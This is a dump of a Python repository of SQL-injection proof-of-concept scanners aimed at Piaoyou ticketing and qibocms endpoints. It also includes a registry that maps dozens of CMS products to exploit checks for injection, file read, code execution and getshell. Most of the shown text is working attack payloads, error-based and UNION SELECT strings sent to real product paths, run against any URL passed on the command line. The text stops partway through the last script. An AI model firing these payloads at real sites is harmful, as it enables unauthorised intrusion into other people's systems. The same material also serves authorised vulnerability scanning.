10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
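class piaoyou_multi_sqli_BaseVerify:
    """Probe six Piaoyou flight-booking endpoints for SQL injection.

    Each path in ``urls`` gets the same error-based suffix appended; every
    hit is printed, and a single "not vulnerable" line is printed only when
    none of them hit.
    """

    def __init__(self, url):
        """Remember the target base URL; probe paths start with ``/`` so it is
        expected without a trailing slash."""
        self.url = url

    def run(self):
        """Send one probe per endpoint and print colored verdicts to stdout.

        Returns nothing. The first request failure aborts the remaining
        endpoints and is reported as "possibly not vulnerable".
        """
        headers = {
            "User-Agent": "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
        }
        # "/hotel/Default.aspx?s=11" is listed twice in the reference PoC and is
        # kept as-is, so that endpoint is probed twice.
        urls = ["/ser_Hotel/SearchList.aspx?CityCode=1%27",
                "/visa/visa_view.aspx?a=11",
                "/travel/Default.aspx?leixing=11",
                "/hotel/Default.aspx?s=11",
                "/travel/Default.aspx?ecity=%E4%B8%8A%E6%B5%B7&leixing=11",
                "/hotel/Default.aspx?s=11"]
        # Shared suffix; the response is checked for the "WtFaBc" prefix it
        # would cause to be echoed alongside the database version.
        suffix = "%20AnD%201=CoNvErT(InT,ChAr(87)%2BChAr(116)%2BChAr(70)%2BChAr(97)%2BChAr(66)%2BChAr(99)%2B@@version)--"
        try:
            noexist = True
            for url in urls:
                vulnurl = self.url + url + suffix
                # verify=False: TLS certificate validation is off so
                # self-signed targets can be scanned.
                req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
                if r"WtFaBcMic" in req.text:
                    cprint("[+]存在票友机票预订系统SQL注入漏洞...(高危)\tpayload: "+vulnurl, "red")
                    noexist = False
            if noexist:
                cprint("[-]不存在piaoyou_multi_sqli漏洞", "white", "on_grey")
        except Exception:
            # Narrowed from a bare ``except:`` so KeyboardInterrupt/SystemExit
            # are no longer swallowed by the best-effort reporting.
            cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")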
41 |
if __name__ == "__main__":
    # Quiet the InsecureRequestWarning raised by the verify=False requests.
    warnings.filterwarnings("ignore")
    piaoyou_multi_sqli_BaseVerify(sys.argv[1]).run()
--------------------------------------------------------------------------------
/pocs/piaoyou/piaoyou_newsview_list.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: 票友票务系统通用sql注入
5 | referer: http://www.wooyun.org/bugs/wooyun-2010-0128207
6 | author: Lucifer
7 | description: 文件/newslist.aspx中,参数newsid存在SQL注入。
8 | 文件/news_view.aspx中,参数id存在SQL注入。
9 | '''
10 | import sys
11 | import requests
12 | import warnings
13 | from termcolor import cprint
14 |
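class piaoyou_newsview_list_BaseVerify:
    """Probe the two Piaoyou news endpoints (newslist.aspx, news_view.aspx) for SQL injection.

    Both paths are tried with the same error-based payload. Every hit is
    printed; the "not vulnerable" line is printed only when neither hits.
    """

    def __init__(self, url):
        """Remember the target base URL; probe paths start with ``/`` so it is
        expected without a trailing slash."""
        self.url = url

    def run(self):
        """Send one probe per endpoint and print colored verdicts to stdout.

        Returns nothing. A request failure aborts the remaining endpoint and
        is reported as "possibly not vulnerable".
        """
        headers = {
            "User-Agent": "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
        }
        checks = [
            "/newslist.aspx?newsid=1Or/**/1=CoNvErT(InT,(ChAr(66)%2BChAr(66)%2BChAr(66)%2B@@VeRsIoN))--",
            "/news_view.aspx?id=1Or/**/1=CoNvErT(InT,(ChAr(66)%2BChAr(66)%2BChAr(66)%2B@@VeRsIoN))--",
        ]
        try:
            # Fix: the original printed "not vulnerable" whenever the second
            # check missed, even after the first had hit. Track hits across
            # both, as the sibling multi-endpoint PoCs do.
            noexist = True
            for path in checks:
                vulnurl = self.url + path
                # verify=False: TLS certificate validation is off so
                # self-signed targets can be scanned.
                req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
                if r"BBBMicrosoft" in req.text:
                    cprint("[+]存在票友票务系统通用sql注入漏洞...(高危)\tpayload: "+vulnurl, "red")
                    noexist = False
            if noexist:
                cprint("[-]不存在piaoyou_newsview_list漏洞", "white", "on_grey")
        except Exception:
            # Narrowed from a bare ``except:`` so KeyboardInterrupt/SystemExit
            # are no longer swallowed by the best-effort reporting.
            cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")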
39 |
if __name__ == "__main__":
    warnings.filterwarnings("ignore")
    checker = piaoyou_newsview_list_BaseVerify(sys.argv[1])
    checker.run()
--------------------------------------------------------------------------------
/pocs/piaoyou/piaoyou_six2_sqli.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: 票友机票预订系统6处SQL注入2(绕过)
5 | referer: http://www.wooyun.org/bugs/wooyun-2015-0116851
6 | author: Lucifer
7 | description: multi sqli。
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
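class piaoyou_six2_sqli_BaseVerify:
    """Probe six Piaoyou back-office endpoints for SQL injection (filter-bypass variant).

    Each path in ``urls`` gets the same suffix appended directly (no
    separator — the reference PoC relies on the target tolerating it); the
    response is checked for the MD5 of the literal 1234 that the injected
    HashBytes() call would echo.
    """

    def __init__(self, url):
        """Remember the target base URL; probe paths start with ``/`` so it is
        expected without a trailing slash."""
        self.url = url

    def run(self):
        """Send one probe per endpoint and print colored verdicts to stdout.

        Returns nothing. The first request failure aborts the remaining
        endpoints and is reported as "possibly not vulnerable".
        """
        headers = {
            "User-Agent": "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
        }
        urls = ["/Parmset/sms_mb_edit.aspx?id=1",
                "/Sales/meb_edit.aspx?id=1",
                "/Sales/meb_his.aspx?id=1",
                "/Other/hotel_edit.aspx?id=1",
                "/Visa/visa_edit.aspx?id=1",
                "/Visa/gjqz_add.aspx?id=214"]
        suffix = "AnD/**/1=Sys.Fn_VarBinToHexStr(HashBytes(%27Md5%27,%271234%27))--"
        try:
            noexist = True
            for url in urls:
                vulnurl = self.url + url + suffix
                # verify=False: TLS certificate validation is off so
                # self-signed targets can be scanned.
                req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
                if r"81dc9bdb52d04dc20036dbd8313ed055" in req.text:
                    cprint("[+]存在票友机票预订系统SQL注入漏洞(绕过)...(高危)\tpayload: "+vulnurl, "red")
                    noexist = False
            if noexist:
                cprint("[-]不存在piaoyou_six2_sqli漏洞", "white", "on_grey")
        except Exception:
            # Narrowed from a bare ``except:`` so KeyboardInterrupt/SystemExit
            # are no longer swallowed by the best-effort reporting.
            cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")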
41 |
if __name__ == "__main__":
    # verify=False in the probe triggers urllib3's InsecureRequestWarning; mute it.
    warnings.filterwarnings("ignore")
    target = sys.argv[1]
    piaoyou_six2_sqli_BaseVerify(target).run()
46 |
--------------------------------------------------------------------------------
/pocs/piaoyou/piaoyou_six_sqli.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: 票友机票预订系统6处SQL注入(绕过)
5 | referer: http://www.wooyun.org/bugs/wooyun-2015-0116851
6 | author: Lucifer
7 | description: multi sqli。
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
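class piaoyou_six_sqli_BaseVerify:
    """Probe six Piaoyou flight/finance endpoints for SQL injection (filter-bypass variant).

    Each path in ``urls`` gets the same suffix appended directly (no
    separator — the reference PoC relies on the target tolerating it); the
    response is checked for the MD5 of the literal 1234 that the injected
    HashBytes() call would echo.
    """

    def __init__(self, url):
        """Remember the target base URL; probe paths start with ``/`` so it is
        expected without a trailing slash."""
        self.url = url

    def run(self):
        """Send one probe per endpoint and print colored verdicts to stdout.

        Returns nothing. The first request failure aborts the remaining
        endpoints and is reported as "possibly not vulnerable".
        """
        headers = {
            "User-Agent": "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
        }
        urls = ["/flight/Print_tp.aspx?sid=1",
                "/flight/Print_tp_3.aspx?sid=1",
                "/Other/train_order_detail.aspx?id=1",
                "/flight/scgq_detail.aspx?id=1",
                "/Finance/Inv_req.aspx?id=1",
                "/System/history.aspx?id=1"]
        suffix = "AnD/**/1=Sys.Fn_VarBinToHexStr(HashBytes(%27Md5%27,%271234%27))--"
        try:
            noexist = True
            for url in urls:
                vulnurl = self.url + url + suffix
                # verify=False: TLS certificate validation is off so
                # self-signed targets can be scanned.
                req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
                if r"81dc9bdb52d04dc20036dbd8313ed055" in req.text:
                    cprint("[+]存在票友机票预订系统SQL注入漏洞(绕过)...(高危)\tpayload: "+vulnurl, "red")
                    noexist = False
            if noexist:
                cprint("[-]不存在piaoyou_six_sqli漏洞", "white", "on_grey")
        except Exception:
            # Narrowed from a bare ``except:`` so KeyboardInterrupt/SystemExit
            # are no longer swallowed by the best-effort reporting.
            cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")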
41 |
if __name__ == "__main__":
    # Suppress the InsecureRequestWarning emitted because the probe uses verify=False.
    warnings.filterwarnings("ignore")
    piaoyou_six_sqli_BaseVerify(sys.argv[1]).run()
46 |
--------------------------------------------------------------------------------
/pocs/piaoyou/piaoyou_ten_sqli.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: 票友机票预订系统10处SQL注入
5 | referer: http://www.wooyun.org/bugs/wooyun-2010-0118867
6 | author: Lucifer
7 | description: multi sqli。
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
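class piaoyou_ten_sqli_BaseVerify:
    """Probe ten Piaoyou flight-booking endpoints for SQL injection.

    Each path in ``urls`` gets the same suffix appended directly (no
    separator — the reference PoC relies on the target tolerating it); the
    response is checked for the MD5 of the literal 1234 that the injected
    HashBytes() call would echo.
    """

    def __init__(self, url):
        """Remember the target base URL; probe paths start with ``/`` so it is
        expected without a trailing slash."""
        self.url = url

    def run(self):
        """Send one probe per endpoint and print colored verdicts to stdout.

        Returns nothing. The first request failure aborts the remaining
        endpoints and is reported as "possibly not vulnerable".
        """
        headers = {
            "User-Agent": "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
        }
        urls = ["/Other/train_input.aspx?memberid=1",
                "/Other/hotel_input.aspx?memberid=1",
                "/Other/input.aspx?memberid=1",
                "/flight/Print_url_sel.aspx?id=2",
                "/flight/Xcd_selected.aspx?id=111",
                "/System/history.aspx?id=1",
                "/flight/scgq.aspx?id=1",
                "/Other/Edit.aspx?id=1",
                "/flight/Html.aspx?id=1",
                "/info/zclist_new.aspx?id=1"]
        suffix = "AnD/**/1=Sys.Fn_VarBinToHexStr(HashBytes(%27Md5%27,%271234%27))--"
        try:
            noexist = True
            for url in urls:
                vulnurl = self.url + url + suffix
                # verify=False: TLS certificate validation is off so
                # self-signed targets can be scanned.
                req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
                if r"81dc9bdb52d04dc20036dbd8313ed055" in req.text:
                    cprint("[+]存在票友机票预订系统10处SQL注入漏洞...(高危)\tpayload: "+vulnurl, "red")
                    noexist = False
            if noexist:
                cprint("[-]不存在piaoyou_ten_sqli漏洞", "white", "on_grey")
        except Exception:
            # Narrowed from a bare ``except:`` so KeyboardInterrupt/SystemExit
            # are no longer swallowed by the best-effort reporting.
            cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")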
45 |
if __name__ == "__main__":
    warnings.filterwarnings("ignore")  # hide InsecureRequestWarning from verify=False
    checker = piaoyou_ten_sqli_BaseVerify(sys.argv[1])
    checker.run()
50 |
--------------------------------------------------------------------------------
/pocs/poc_db.py:
--------------------------------------------------------------------------------
1 | # -*- coding: utf-8 -*-
2 | from find_cms.cms_enum import *
3 | from pocs import *
4 |
5 |
6 | class poc_db:
7 | def __init__(self):
8 | self.data = {
9 | Cms_Enum.dedecms: {
10 | "dedecms版本探测": "dedecms_version_BaseVerify(self.cms_mode.url).run()",
11 | "dedecms download.php重定向漏洞": "dedecms_download_redirect_BaseVerify(self.cms_mode.url).run()",
12 | "dedecms trace爆路径漏洞": "dedecms_error_trace_disclosure_BaseVerify(self.cms_mode.url).run()",
13 | "dedecms recommend.php SQL注入": "dedecms_recommend_sqli_BaseVerify(self.cms_mode.url).run()",
14 | "dedecms search.php SQL注入漏洞": "dedecms_search_typeArr_sqli_BaseVerify(self.cms_mode.url).run()",
15 | },
16 | Cms_Enum.phpcms: {
17 | "phpcms authkey泄露": "phpcms_authkey_disclosure_BaseVerify(self.cms_mode.url).run()",
18 | "phpcms digg_add.php SQL注入": "phpcms_digg_add_sqli_BaseVerify(self.cms_mode.url).run()",
19 | "phpcms2008 flash_upload.php SQL注入": "phpcms_flash_upload_sqli_BaseVerify(self.cms_mode.url).run()",
20 | "phpcms2008 product.php 代码执行": "phpcms_product_code_exec_BaseVerify(self.cms_mode.url).run()",
21 | "phpcms v9 flash xss漏洞": "phpcms_v9_flash_xss_BaseVerify(self.cms_mode.url).run()",
22 | "phpcms v9.6.0 SQL注入": "phpcms_v96_sqli_BaseVerify(self.cms_mode.url).run()",
23 | "phpcms 9.6.1任意文件读取漏洞": "phpcms_v961_fileread_BaseVerify(self.cms_mode.url).run()"
24 | },
25 | Cms_Enum.seacms: {
26 | "seacms 6.45 search.php order参数前台代码执行": "seacms_order_code_exec_BaseVerify(self.cms_mode.url).run()",
27 | "seacms search.php 代码执行": "seacms_search_code_exec_BaseVerify(self.cms_mode.url).run()",
28 | "seacms search.php 参数jq代码执行": "seacms_search_jq_code_exec_BaseVerify(self.cms_mode.url).run()"
29 | },
30 | Cms_Enum.discuz: {
31 | "discuz X3 focus.swf flashxss漏洞": "discuz_focus_flashxss_BaseVerify(self.cms_mode.url).run()",
32 | "discuz论坛forum.php参数message SSRF漏洞": "discuz_forum_message_ssrf_BaseVerify(self.cms_mode.url).run()",
33 | "discuz问卷调查参数orderby注入漏洞": "discuz_plugin_ques_sqli_BaseVerify(self.cms_mode.url).run()",
34 | "discuz! X2.5 物理路径泄露漏洞": "discuz_x25_path_disclosure_BaseVerify(self.cms_mode.url).run()"
35 | },
36 | Cms_Enum.acsoft: {
37 | "安财软件GetFile任意文件读取": "acsoft_GetFile_fileread_BaseVerify(self.cms_mode.url).run()",
38 | "安财软件GetFileContent任意文件读取": "acsoft_GetFileContent_fileread_BaseVerify(self.cms_mode.url).run()",
39 | "安财软件GetXMLList任意文件读取": "acsoft_GetXMLList_fileread_BaseVerify(self.cms_mode.url).run()"
40 | },
41 | Cms_Enum.cmseasy: {
42 | "cmseasy header.php 报错注入": "cmseasy_header_detail_sqli_BaseVerify(self.cms_mode.url).run()"
43 |
44 | },
45 | Cms_Enum.dreamgallery: {
46 | "dreamgallery album.php SQL注入": "dreamgallery_album_id_sqli_BaseVerify(self.cms_mode.url).run()"
47 | },
48 | Cms_Enum.ecshop: {
49 | "ecshop3.0 flow.php 参数order_id注入": "ecshop_flow_orderid_sqli_BaseVerify(self.cms_mode.url).run()",
50 | "ecshop uc.php参数code SQL注入": "ecshop_uc_code_sqli_BaseVerify(self.cms_mode.url).run()"
51 | },
52 | Cms_Enum.eyou: {
53 | "亿邮Email Defender系统免登陆DBA注入": "eyou_admin_id_sqli_BaseVerify(self.cms_mode.url).run()",
54 | "亿邮邮件系统重置密码问题暴力破解": "eyou_resetpw_BaseVerify(self.cms_mode.url).run()",
55 | "亿邮mail5 user 参数kw SQL注入": "eyou_user_kw_sqli_BaseVerify(self.cms_mode.url).run()",
56 | "亿邮邮箱弱口令列表泄露": "eyou_weakpass_BaseVerify(self.cms_mode.url).run()"
57 | },
58 | Cms_Enum.fastmeeting: {
59 | "好视通视频会议系统(fastmeeting)任意文件遍历": "fastmeeting_download_filedownload_BaseVerify(self.cms_mode.url).run()"
60 | },
61 | Cms_Enum.finecms: {
62 | "FineCMS免费版文件上传漏洞": "finecms_uploadfile_BaseVerify(self.cms_mode.url).run()"
63 |
64 | },
65 | Cms_Enum.FoosunCms: {
66 | "Dotnetcms(风讯cms)SQL注入漏洞": "foosun_City_ajax_sqli_BaseVerify(self.cms_mode.url).run()"
67 |
68 | },
69 | Cms_Enum.fsmcms: {
70 | "FSMCMS columninfo.jsp文件参数ColumnID SQL注入": "fsmcms_columninfo_sqli_BaseVerify(self.cms_mode.url).run()",
71 | "fsmcms p_replydetail.jsp注入漏洞": "fsmcms_p_replydetail_sqli_BaseVerify(self.cms_mode.url).run()",
72 | "FSMCMS网站重装漏洞": "fsmcms_setup_reinstall_BaseVerify(self.cms_mode.url).run()"
73 | },
74 | Cms_Enum.gowinsoft_jw: {
75 | "金窗教务系统存在多处SQL注射漏洞": "gowinsoft_jw_multi_sqli_BaseVerify(self.cms_mode.url).run()"
76 | },
77 | Cms_Enum.hanweb: {
78 | "大汉downfile.jsp 任意文件下载": "hanweb_downfile_filedownload_BaseVerify(self.cms_mode.url).run()",
79 | "大汉版通JCMS数据库配置文件读取漏洞": "hanweb_readxml_fileread_BaseVerify(self.cms_mode.url).run()",
80 | "大汉VerfiyCodeServlet越权漏洞": "hanweb_VerifyCodeServlet_install_BaseVerify(self.cms_mode.url).run()"
81 | },
82 | Cms_Enum.joomla: {
83 | "joomla组件com_docman本地文件包含": "joomla_com_docman_lfi_BaseVerify(self.cms_mode.url).run()",
84 | "joomla 3.7.0 core SQL注入": "joomla_index_list_sqli_BaseVerify(self.cms_mode.url).run()"
85 | },
86 | Cms_Enum.kxmail: {
87 | "科信邮件系统login.server.php 时间盲注": "kxmail_login_server_sqli_BaseVerify(self.cms_mode.url).run()"
88 | },
89 | Cms_Enum.libsys: {
90 | "汇文软件图书管理系统ajax_asyn_link.php任意文件读取": "libsys_ajax_asyn_link_fileread_BaseVerify(self.cms_mode.url).run()",
91 | "汇文软件图书管理系统ajax_asyn_link.old.php任意文件读取": "libsys_ajax_asyn_link_old_fileread_BaseVerify(self.cms_mode.url).run()",
92 | "汇文软件图书管理系统ajax_get_file.php任意文件读取": "libsys_ajax_get_file_fileread_BaseVerify(self.cms_mode.url).run()"
93 | },
94 | Cms_Enum.metinfo: {
95 | "metinfo5.0 getpassword.php两处时间盲注漏洞": "metinfo_getpassword_sqli_BaseVerify(self.cms_mode.url).run()",
96 | "metinfo v5.3sql注入漏洞": "metinfo_login_check_sqli_BaseVerify(self.cms_mode.url).run()"
97 | },
98 | Cms_Enum.pageadmin: {
99 | "PageAdmin可“伪造”VIEWSTATE执行任意SQL查询&重置管理员密码": "pageadmin_forge_viewstate_BaseVerify(self.cms_mode.url).run()"
100 | },
101 | Cms_Enum.phpok: {
102 | "phpok api.php SQL注入漏洞": "phpok_api_param_sqli_BaseVerify(self.cms_mode.url).run()",
103 | "phpok remote_image getshell漏洞": "phpok_remote_image_getshell_BaseVerify(self.cms_mode.url).run()",
104 | "phpok res_action_control.php 任意文件下载(需要cookies文件)": "phpok_res_action_control_filedownload_BaseVerify(self.cms_mode.url).run()"
105 | },
106 | Cms_Enum.piaoyou: {
107 | "票友票务系统int_order.aspx SQL注入": "piaoyou_int_order_sqli_BaseVerify(self.cms_mode.url).run()",
108 | "票友机票预订系统6处SQL注入": "piaoyou_multi_sqli_BaseVerify(self.cms_mode.url).run()",
109 | "票友票务系统通用sql注入": "piaoyou_newsview_list_BaseVerify(self.cms_mode.url).run()",
110 | "票友机票预订系统6处SQL注入2(绕过)": "piaoyou_six2_sqli_BaseVerify(self.cms_mode.url).run()",
111 | "票友机票预订系统6处SQL注入(绕过)": "piaoyou_six_sqli_BaseVerify(self.cms_mode.url).run()",
112 | "票友机票预订系统10处SQL注入": "piaoyou_ten_sqli_BaseVerify(self.cms_mode.url).run()"
113 | },
114 | Cms_Enum.qibocms: {
115 | "qibocms news/js.php文件参数f_idSQL注入": "qibocms_js_f_id_sqli_BaseVerify(self.cms_mode.url).run()",
116 | "qibocms s.php文件参数fids SQL注入": "qibocms_s_fids_sqli_BaseVerify(self.cms_mode.url).run()",
117 | "qibo分类系统search.php 代码执行": "qibocms_search_code_exec_BaseVerify(self.cms_mode.url).run()",
118 | "qibocms知道系统SQL注入": "qibocms_search_sqli_BaseVerify(self.cms_mode.url).run()"
119 | },
120 | Cms_Enum.shopex: {
121 | "shopex敏感信息泄露": "shopex_phpinfo_disclosure_BaseVerify(self.cms_mode.url).run()"
122 | },
123 | Cms_Enum.shopnc: {
124 | "shopNC B2B版 index.php SQL注入": "shopnc_index_class_id_sqli_BaseVerify(self.cms_mode.url).run()"
125 | },
126 | Cms_Enum.siteengine: {
127 | "SiteEngine 6.0 & 7.1 SQL注入漏洞": "siteengine_comments_module_sqli_BaseVerify(self.cms_mode.url).run()"
128 | },
129 | Cms_Enum.siteserver: {
130 | "siteserver3.6.4 background_administrator.aspx注入": "siteserver_background_administrator_sqli_BaseVerify(self.cms_mode.url).run()",
131 | "siteserver3.6.4 background_keywordsFilting.aspx注入": "siteserver_background_keywordsFilting_sqli_BaseVerify(self.cms_mode.url).run()",
132 | "siteserver3.6.4 background_log.aspx注入": "siteserver_background_log_sqli_BaseVerify(self.cms_mode.url).run()",
133 | "siteserver3.6.4 background_taskLog.aspx注入": "siteserver_background_taskLog_sqli_BaseVerify(self.cms_mode.url).run()",
134 | "siteserver3.6.4 user.aspx注入": "siteserver_UserNameCollection_sqli_BaseVerify(self.cms_mode.url).run()"
135 | },
136 | Cms_Enum.thinkphp: {
137 | "Onethink 参数category SQL注入": "onethink_category_sqli_BaseVerify(self.cms_mode.url).run()",
138 | "ThinkPHP 代码执行漏洞": "thinkphp_code_exec_BaseVerify(self.cms_mode.url).run()",
139 | "ThinkPHP V5代码执行漏洞": "thinkphp_v5_exec_BaseVerify(self.cms_mode.url).run()"
140 | },
141 | Cms_Enum.thinksns: {
142 | "thinksns category模块代码执行": "thinksns_category_code_exec_BaseVerify(self.cms_mode.url).run()"
143 | },
144 | Cms_Enum.typecho: {
145 | "typecho install.php反序列化命令执行": "typecho_install_code_exec_BaseVerify(self.cms_mode.url).run()"
146 | },
147 | Cms_Enum.umail: {
148 | "umail物理路径泄露": "umail_physical_path_BaseVerify(self.cms_mode.url).run()",
149 | "umail_physical_path_BaseVerify": "umail_sessionid_access_BaseVerify(self.cms_mode.url).run()"
150 | },
151 | Cms_Enum.urp: {
152 | "urp查询接口曝露": "urp_query_BaseVerify(self.cms_mode.url).run()",
153 | "URP越权查看任意学生课表、成绩(需登录)": "urp_query2_BaseVerify(self.cms_mode.url).run()",
154 | "URP综合教务系统任意文件读取": "urp_ReadJavaScriptServlet_fileread_BaseVerify(self.cms_mode.url).run()"
155 | },
156 | Cms_Enum.weaver_oa: {
157 | "泛微OA 数据库配置泄露": "weaver_oa_db_disclosure_BaseVerify(self.cms_mode.url).run()",
158 | "泛微OA filedownaction SQL注入": "weaver_oa_download_sqli_BaseVerify(self.cms_mode.url).run()",
159 | "泛微OA downfile.php 任意文件下载漏洞": "weaver_oa_filedownload_BaseVerify(self.cms_mode.url).run()"
160 | },
161 | Cms_Enum.wecenter: {
162 | "wecenter SQL注入": "wecenter_topic_id_sqli_BaseVerify(self.cms_mode.url).run()"
163 | },
164 | Cms_Enum.wordpress: {
165 | "wordpress admin-ajax.php任意文件下载": "wordpress_admin_ajax_filedownload_BaseVerify(self.cms_mode.url).run()",
166 | "wordpress display-widgets插件后门漏洞": "wordpress_display_widgets_backdoor_BaseVerify(self.cms_mode.url).run()",
167 | "Wordpress AzonPop插件SQL注入": "wordpress_plugin_azonpop_sqli_BaseVerify(self.cms_mode.url).run()",
168 | "wordpress 插件mailpress远程代码执行": "wordpress_plugin_mailpress_rce_BaseVerify(self.cms_mode.url).run()",
169 | "wordpress 插件shortcode0.2.3 本地文件包含": "wordpress_plugin_ShortCode_lfi_BaseVerify(self.cms_mode.url).run()",
170 | "wordpress rest api权限失效导致内容注入": "wordpress_restapi_sqli_BaseVerify(self.cms_mode.url).run()",
171 | "wordpress插件跳转": "wordpress_url_redirect_BaseVerify(self.cms_mode.url).run()",
172 | "wordpress 插件WooCommerce PHP代码注入": "wordpress_woocommerce_code_exec_BaseVerify(self.cms_mode.url).run()"
173 | },
174 | Cms_Enum.xplus: {
175 | "xplus npmaker 2003系统GETSHELL": "xplus_2003_getshell_BaseVerify(self.cms_mode.url).run()",
176 | "xplus通用注入": "xplus_mysql_mssql_sqli_BaseVerify(self.cms_mode.url).run()"
177 | },
178 | Cms_Enum.zfsoft: {
179 | "正方教务系统数据库任意操纵": "zfsoft_database_control_BaseVerify(self.cms_mode.url).run()",
180 | "正方教务系统default3.aspx爆破页面": "zfsoft_default3_bruteforce_BaseVerify(self.cms_mode.url).run()",
181 | "正方教务系统services.asmx SQL注入": "zfsoft_service_stryhm_sqli_BaseVerify(self.cms_mode.url).run()"
182 | },
183 | Cms_Enum.zuitu: {
184 | "最土团购SQL注入": "zuitu_coupon_id_sqli_BaseVerify(self.cms_mode.url).run()"
185 | }
186 |
187 | }
188 |
--------------------------------------------------------------------------------
/pocs/qibocms/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Binye234/What_Cms_Auto_Poc/56cae28bfecfe3032efe6578c3f571e5de21a3e9/pocs/qibocms/__init__.py
--------------------------------------------------------------------------------
/pocs/qibocms/qibocms_js_f_id_sqli.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: qibocms news/js.php文件参数f_idSQL注入
5 | referer: http://www.wooyun.org/bugs/wooyun-2014-075317
6 | author: Lucifer
7 | description: 文件/news/js.php中,参数f_id存在SQL注入。
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
class qibocms_js_f_id_sqli_BaseVerify:
    """Probe for the qibocms /news/js.php ``f_id`` SQL injection (module docstring cites WooYun-2014-075317).

    One GET request. The injected UNION SELECT makes the database evaluate
    ``Md5(1234)``; the check only looks for that digest in the response body,
    so nothing from the target's tables is read by this probe. The verdict is
    printed, never returned.
    """

    def __init__(self, url):
        # Base URL (scheme + host[:port]). run() appends its path with plain
        # string concatenation, so a trailing slash here yields a double slash.
        self.url = url

    def run(self):
        """Send the probe and print a colour-coded verdict (returns None)."""
        headers = {
            # Fixed browser-like UA; the same string is reused across the pocs/ tree.
            "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
        }
        # Query string is pre-URL-encoded in the literal (%20, %23); mixed-case
        # keywords are a naive keyword-filter bypass. For defenders: a UNION
        # SELECT inside the f_id parameter is a reliable log/WAF signature.
        payload = "/news/js.php?f_id=1)%20UnIoN%20SeLeCt%201,Md5(1234),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51%23&type=hot"
        vulnurl = self.url + payload
        try:
            # verify=False disables TLS certificate validation: any on-path
            # responder is accepted as the target.
            req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
            # 81dc9bdb52d04dc20036dbd8313ed055 == md5("1234"); it has to be
            # reflected into the page for the check to fire.
            if r"81dc9bdb52d04dc20036dbd8313ed055" in req.text:
                cprint("[+]存在qibocms news/js.php文件参数f_idSQL注入漏洞...(高危)\tpayload: "+vulnurl, "red")
            else:
                cprint("[-]不存在qibocms_js_f_id_sqli漏洞", "white", "on_grey")

        except:
            # NOTE(review): a bare except also swallows KeyboardInterrupt and
            # SystemExit, so an interrupted request is reported as "probably
            # not vulnerable"; requests.RequestException is the narrower catch.
            cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")
33 |
if __name__ == "__main__":
    # CLI entry: the single positional argument is the target base URL.
    # Every warning is silenced, which also hides the TLS warning that
    # verify=False would otherwise emit on each request.
    warnings.filterwarnings("ignore")
    target = sys.argv[1]
    qibocms_js_f_id_sqli_BaseVerify(target).run()
--------------------------------------------------------------------------------
/pocs/qibocms/qibocms_s_fids_sqli.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: qibocms s.php文件参数fids SQL注入
5 | referer: http://www.wooyun.org/bugs/wooyun-2014-079938
6 | author: Lucifer
7 | description: 文件/coupon/s.php中,参数fids存在SQL注入。
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
class qibocms_s_fids_sqli_BaseVerify:
    """Probe for the qibocms /coupon/s.php ``fids[]`` SQL injection (module docstring cites WooYun-2014-079938).

    One GET request; the injected UNION SELECT makes the database compute
    ``Md5(1234)`` and the response is searched for that digest. Only a
    constant is selected — no table data is read. The verdict is printed,
    not returned.
    """

    def __init__(self, url):
        # Base URL; the probe path is appended by string concatenation.
        self.url = url

    def run(self):
        """Send the probe and print a colour-coded verdict (returns None)."""
        headers = {
            # Fixed browser-like UA shared by the other pocs/ modules.
            "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
        }
        # The injection point is an array parameter (fids[]); the literal is
        # already URL-encoded (%20, %23).
